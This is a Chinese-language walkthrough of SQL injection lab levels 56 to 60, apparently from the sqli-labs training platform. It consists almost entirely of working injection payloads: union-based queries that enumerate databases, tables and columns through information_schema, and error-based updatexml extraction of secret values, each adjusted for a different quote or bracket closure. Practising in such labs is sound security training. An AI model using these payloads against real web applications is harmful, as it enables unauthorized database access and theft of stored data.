56关

?id=-1')union select 1,2,database()--+  看数据库

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+  看表

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='5k7pxhtjq1'--+  看列

然后就是key的值了

?id=-1') union select 1,group_concat(secret_RSHU),3 from 5k7pxhtjq1--+

57关

这关跟上边一样但是用双引号闭合

查数据库

?id=-1"union select 1,database(),version()--+

查到表名bxvue0mivj

?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

在查看列

?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='bxvue0mivj'--+

58关

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+
爆表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='o5jav1pxvu'),0x7e),1)--+
爆列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_6HR1) from challenges.o5jav1pxvu),0x7e),1)--+

59关

查数据库?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

查到表名

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='add90s9njg' limit 0,1),0x7e),1)-- q

id=1 and updatexml(1,concat(0x7e,(select secret_CYFO from add90s9njg limit 0,1),0x7e),1)-- q

60关

跟上边一样闭合不同

?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1") and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q  查表

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='4cnqwjiczk' limit 0,1),0x7e),1)-- q  查列

id=1") and updatexml(1,concat(0x7e,(select secret_0LPA from 4cnqwjiczk limit 0,1),0x7e),1)-- q